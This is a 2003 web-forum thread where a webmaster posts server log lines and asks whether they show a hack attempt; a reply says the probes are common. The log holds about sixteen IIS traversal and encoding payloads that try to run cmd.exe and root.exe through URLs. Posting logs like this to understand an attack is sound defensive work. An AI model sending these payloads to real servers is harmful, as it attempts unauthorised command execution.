1. Home
  2. Forums Index
  3. WebmasterWorld / Website Analytics - Tracking and Logging 9:17 am May 14, 2026

Forum Moderators: DixonJones

Message Too Old, No Replies

MMM, someone hacking me?

Possible hack attempt to start cmd.exe?

         

traxdata0072000

12:08 pm on Dec 20, 2003 (gmt 0)

10+ Year Member



Hello,

I have a strange feeling that this was a hack attempt (See log below). Masket out "attackers" ip number with *.*.*.* .

*.*.*.* - - [10/Dec/2003:10:28:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
*.*.*.* - - [10/Dec/2003:10:28:33 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
*.*.*.* - - [10/Dec/2003:10:28:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
*.*.*.* - - [10/Dec/2003:10:28:33 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
*.*.*.* - - [10/Dec/2003:10:28:35 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
*.*.*.* - - [10/Dec/2003:10:28:35 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:35 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 331
*.*.*.* - - [10/Dec/2003:10:28:37 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 331
*.*.*.* - - [10/Dec/2003:10:28:37 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
*.*.*.* - - [10/Dec/2003:10:28:37 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341

Anyone knows what is guy was up to? Or wasn't this a hack try? What can i make up from this log?

Thanks in advance,
T

Spica

12:36 pm on Dec 20, 2003 (gmt 0)

10+ Year Member



Nothing new. See for example:
[webmasterworld.com...]

traxdata0072000

2:13 pm on Dec 20, 2003 (gmt 0)

10+ Year Member



Thanks Spica , this can't bother me :-).

Now i can rest and have a merry christmas to you ;-)

Many thanks,
T

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. WebmasterWorld / Website Analytics - Tracking and Logging 9:17 am May 14, 2026